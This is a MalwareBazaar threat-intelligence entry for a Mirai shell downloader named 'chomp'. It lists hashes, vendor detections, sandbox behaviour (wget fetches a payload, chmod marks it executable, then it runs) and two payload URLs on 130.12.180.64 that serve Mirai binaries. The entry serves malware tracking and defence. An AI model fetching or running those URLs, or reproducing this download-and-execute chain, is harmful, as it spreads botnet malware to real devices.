MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 41a98b6c804e2390450ac5e3fe88df7d1eef0fdfd77359a051c875ee9e64f5c7. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry


Mirai


Vendor detections: 7


Intelligence 7 IOCs YARA File information Comments
Download sample Add tag Delete this sample Report a False Positive

SHA256 hash: 41a98b6c804e2390450ac5e3fe88df7d1eef0fdfd77359a051c875ee9e64f5c7
SHA3-384 hash: 209227d0f19e6f768dc9e985e39cf36b44b97cdc464272b8d2dee63ec745a1a5695bcedde77bd7b2dc202532be7d6aab
SHA1 hash: d3812fb6016df33a9e16fdf4fbeb5ccf84999cc6
MD5 hash: 68780681b329253d649e9fbc0e034c06
humanhash: king-rugby-london-skylark
File name:chomp
Download: download sample
Signature Mirai
Create hunting rule
File size:156 bytes
First seen:2025-12-21 15:14:29 UTC
Last seen:2025-12-22 01:15:09 UTC
File type: sh
MIME type:text/plain
ssdeep 3:LxAjdVZVb8NBzSa+ANja8PeFKRDxAjdVZVCONBzSa5Ap9MVv:L6VbkPjNaKD6Vxy+Vv
TLSH T14EC0809F10271541C108FE2011F5301DB181C9C235B00B0D97D92433F8CD500B71CD11
Magika shell
Reporter abuse_ch
Tags:sh
URLMalware sample (SHA256 hash)SignatureTags
http://130.12.180.64/splmips2928a4694f399990791e7d0c00cb21c7fe852654df493d541097b7ce85815ec5 Miraielf mirai ua-wget
http://130.12.180.64/splmpsl3cd8a62933ca2ee92f4a556c9d59ae1679070eec6343b38d6ef6f75cf5190ced Miraielf mirai ua-wget

Intelligence

File Origin
# of uploads :
2
# of downloads :
39
Origin country :
DE DE
Vendor Threat Intelligence
No detections
Detection(s):
SecuriteInfo.com.Linux.Downloader-35.UNOFFICIAL
Create hunting rule

Verdict:
Malicious
Threat level:
  10/10
Confidence:
100%
Tags:
mirai
Link:
https://www.filescan.io/uploads/694814273f8fdbf8e94da2a9/reports/0a6af48e-eb2e-49c0-840c-10e0db29512f/overview
Verdict:
Unknown
Link:
https://www.hybrid-analysis.com/sample/41a98b6c804e2390450ac5e3fe88df7d1eef0fdfd77359a051c875ee9e64f5c7
Verdict:
Malicious
File Type:
text
First seen:
2025-12-21T12:37:00Z UTC
Last seen:
2025-12-23T00:53:00Z UTC
Hits:
~10
Detections:
HEUR:Trojan-Downloader.Shell.Agent.p
Link:
https://opentip.kaspersky.com/41a98b6c804e2390450ac5e3fe88df7d1eef0fdfd77359a051c875ee9e64f5c7/results?tab=lookup
Status:
terminated
Link:
https://sandbox.kunai.rocks/analysis/98e75ed1-510c-4d0f-987d-9a3d6b7d3d59
Behavior Graph:
Download SVG
%3 guuid=40b8f62c-1a00-0000-d2f7-27eda0090000 pid=2464 /usr/bin/sudo guuid=e9ee012f-1a00-0000-d2f7-27eda6090000 pid=2470 /tmp/sample.bin guuid=40b8f62c-1a00-0000-d2f7-27eda0090000 pid=2464->guuid=e9ee012f-1a00-0000-d2f7-27eda6090000 pid=2470 execve guuid=7c72672f-1a00-0000-d2f7-27eda8090000 pid=2472 /usr/bin/wget net send-data write-file guuid=e9ee012f-1a00-0000-d2f7-27eda6090000 pid=2470->guuid=7c72672f-1a00-0000-d2f7-27eda8090000 pid=2472 execve guuid=8d281736-1a00-0000-d2f7-27edbb090000 pid=2491 /usr/bin/chmod guuid=e9ee012f-1a00-0000-d2f7-27eda6090000 pid=2470->guuid=8d281736-1a00-0000-d2f7-27edbb090000 pid=2491 execve guuid=8c555f36-1a00-0000-d2f7-27edbc090000 pid=2492 /usr/bin/dash guuid=e9ee012f-1a00-0000-d2f7-27eda6090000 pid=2470->guuid=8c555f36-1a00-0000-d2f7-27edbc090000 pid=2492 clone guuid=c125e936-1a00-0000-d2f7-27edbf090000 pid=2495 /usr/bin/wget net send-data write-file guuid=e9ee012f-1a00-0000-d2f7-27eda6090000 pid=2470->guuid=c125e936-1a00-0000-d2f7-27edbf090000 pid=2495 execve guuid=0cb97b3b-1a00-0000-d2f7-27edcb090000 pid=2507 /usr/bin/chmod guuid=e9ee012f-1a00-0000-d2f7-27eda6090000 pid=2470->guuid=0cb97b3b-1a00-0000-d2f7-27edcb090000 pid=2507 execve guuid=b28ac23b-1a00-0000-d2f7-27edcd090000 pid=2509 /usr/bin/dash guuid=e9ee012f-1a00-0000-d2f7-27eda6090000 pid=2470->guuid=b28ac23b-1a00-0000-d2f7-27edcd090000 pid=2509 clone f22fee75-ab34-540d-95fe-696883c6f4ad 130.12.180.64:80 guuid=7c72672f-1a00-0000-d2f7-27eda8090000 pid=2472->f22fee75-ab34-540d-95fe-696883c6f4ad send: 135B guuid=c125e936-1a00-0000-d2f7-27edbf090000 pid=2495->f22fee75-ab34-540d-95fe-696883c6f4ad send: 135B
Score:
100%
Verdict:
Malware
File Type:
SCRIPT
Link:
https://malprob.io/report/41a98b6c804e2390450ac5e3fe88df7d1eef0fdfd77359a051c875ee9e64f5c7
Detection:
n/a
Link:
https://mwdb.cert.pl/sample/41a98b6c804e2390450ac5e3fe88df7d1eef0fdfd77359a051c875ee9e64f5c7/
Verdict:
Malicious
Threat:
Family.MIRAI
Link:
https://tip.neiki.dev/file/41a98b6c804e2390450ac5e3fe88df7d1eef0fdfd77359a051c875ee9e64f5c7
Threat name:
Script-Shell.Downloader.Heuristic
Create hunting rule
Status:
Malicious
First seen:
2025-12-21 15:37:14 UTC
File Type:
Text (Shell)
AV detection:
3 of 24 (12.50%)
Threat level:
  2/5
Detection(s):
Suspicious file
Link:
https://check.spamhaus.org/check/?searchterm=iguyw3eajyrzarikyxr75cg7pupo6d6725zvticrzb265hte6xdq._file
Result
Malware family:
n/a
Score:
  3/10
Tags:
n/a
Link:
https://tria.ge/reports/251223-lmqzcaskb1/
Behaviour
Modifies registry class
Suspicious use of SetWindowsHookEx
Enumerates physical storage devices
Please note that we are no longer able to provide a coverage score for Virus Total.
Threat name:
Legit
Score:
0.00
Link:
https://yomi.yoroi.company/submissions/41a98b6c804e2390450ac5e3fe88df7d1eef0fdfd77359a051c875ee9e64f5c7

File information

The table below shows additional information about this malware sample such as delivery method and external references.

Web download

Mirai

sh 41a98b6c804e2390450ac5e3fe88df7d1eef0fdfd77359a051c875ee9e64f5c7

(this sample)

Mirai

elf 2928a4694f399990791e7d0c00cb21c7fe852654df493d541097b7ce85815ec5

  
URLhaus
https://urlhaus.abuse.ch/url/3739358/
  
Delivery method
Distributed via web download
  
Dropping
MD5 84dd56e920d221a25a41f0e25fbd213d
  
Dropping
SHA256 2928a4694f399990791e7d0c00cb21c7fe852654df493d541097b7ce85815ec5

Comments